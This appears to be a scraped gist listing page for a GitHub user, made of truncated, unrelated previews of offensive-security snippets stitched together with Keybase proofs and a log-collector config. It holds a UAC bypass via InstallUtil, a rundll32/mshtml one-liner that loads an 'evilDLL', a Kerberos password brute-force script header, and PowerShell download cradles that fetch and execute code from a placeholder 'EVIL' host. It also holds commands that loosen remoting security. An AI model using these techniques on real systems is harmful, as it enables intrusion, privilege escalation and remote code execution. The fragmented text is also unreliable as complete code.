jymcheong

using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass

jymcheong

Keybase proof

I hereby claim:

• I am jymcheong on github.
• I am jymcheong (https://keybase.io/jymcheong) on keybase.
• I have a public key ASDyhHZXOSElNLw6pmYjkIV7zFuVlbyLE5ijcjY_nKmhKQo

To claim this, I am signing this object:

jymcheong

Keybase proof

I hereby claim:

• I am jymcheong on github.
• I am jym (https://keybase.io/jym) on keybase.
• I have a public key ASDzhYMcTsIr1-tEfuHaJnmfe5OGtUmwmFRPz7Or4VYVBwo

To claim this, I am signing this object:

jymcheong

REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();

jymcheong

<Input in>
    Module      im_msvistalog
    ReadFromLast    True

Query   <QueryList>\
        <Query Id="0">\
            <Select Path="Security">*</Select>\
            <Select Path="System">*[System/Level=4]</Select>\
            <Select Path="Application">*[Application/Level=2]</Select>\
            <Select Path="Setup">*[System/Level=3]</Select>\

jymcheong

#!/bin/bash

# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful

jymcheong

$comp = '<IP address>'  # if in domain, use windows machine name
$username = '<Machine/admin_name>'
$password = '<Password>'
$pass = ConvertTo-SecureString -AsPlainText $password -Force
$SecureString = $pass
$MySecureCreds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username,$SecureString 

#gwmi win32_service –credential $MySecureCreds –computer 172.16.199.162

#Invoke-WmiMethod -computer $comp –credential $MySecureCreds -Class win32_process -Name create -ArgumentList "notepad"

jymcheong

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

jymcheong

#Run winrm quickconfig defaults
echo Y | winrm quickconfig

#Run enable psremoting command with defaults
Enable-PSRemoting -force

# adjust local token filter policy
Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord

#Enabled Trusted Hosts for Universial Access

jymcheong

<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>

function Get-WmiNamespace {
    [OutputType([String])]
    Param (
        [String]
        [ValidateNotNullOrEmpty()]